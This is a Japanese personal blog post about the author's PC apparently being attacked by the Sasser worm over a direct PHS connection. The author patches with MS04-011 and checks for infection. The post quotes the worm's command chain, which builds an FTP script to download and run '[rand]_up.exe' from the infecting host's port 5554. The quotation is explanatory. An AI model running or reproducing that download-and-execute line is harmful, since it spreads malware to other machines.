W32.Sasser.worm

W32.Sasser.wormが猛威をふるっているらしい.
自分のPCでもそれらしい症状が発現(汗

@FreeDで繋ぐと,インターネット側直結になるので,LSASSをつつかれて,エラーが発生.
Windowsが致命的なシステム障害と認識して,リブートに入ってしまう.

ちなみに,こんな攻撃をしているらしい.
 LSASSの脆弱性を攻撃し、9996番ポートでシェルを実行。以下のコマンドを実行してランダム数字_up.exeというファイルを取得。avserve.exeとして%WINDIR% にインストール。レジストリに実行のキーを追加。5554ポートでFTPサーバとして動く。
echo off&echo open [infecting machine's IP] 5554>>cmd.ftp&echo
anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get [rand]_up.
exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[rand]i_up.
exe&echo off&del cmd.ftp&echo on

なんか急にこんな症状でてきて,おっかしいなぁと思っていたところ,MSからのメールや巡回先のblogからwormのせいらしいと判明.
 http://www.microsoft.com/japan/security/incident/sasser.mspx

たまたま実家にいたので,速攻Windows UpdateでMS04-011を適用して,上記のサイトで感染しているかをチェック.
結果は,”感染なし”だったのでよかったけど,久々にちょっと焦ってしまった.
普段はルータ経由で使っているので,直で攻撃を受けることはなかったので,PHSで接続するときは注意が必要だ.
まぁ,@FreeD/64kでWindows Updateなんてかなりツライが…

あとは,WindowsXPのファイヤーウォール機能がどれだけのものか,早急にレビューが必要だなぁ.

@FreeD,AirHをお使いの同期のみなさん,要注意ですよ〜

0 コメント:

コメントを投稿

About me

眼鏡の街・鯖江生まれ、FNCT→TUT→某通信系企業に勤めています。
お酒と美味しいモノが大好き、目指す技術者像はヤマト技師長・真田志郎。とあるSEの生き様を細々と綴っています…
ピンチのときには「こんなこともあろうかと…」と切り抜けるゾ(^o^)/
Powered by Blogger.

フォロワー

Blog Archive

Blog Archive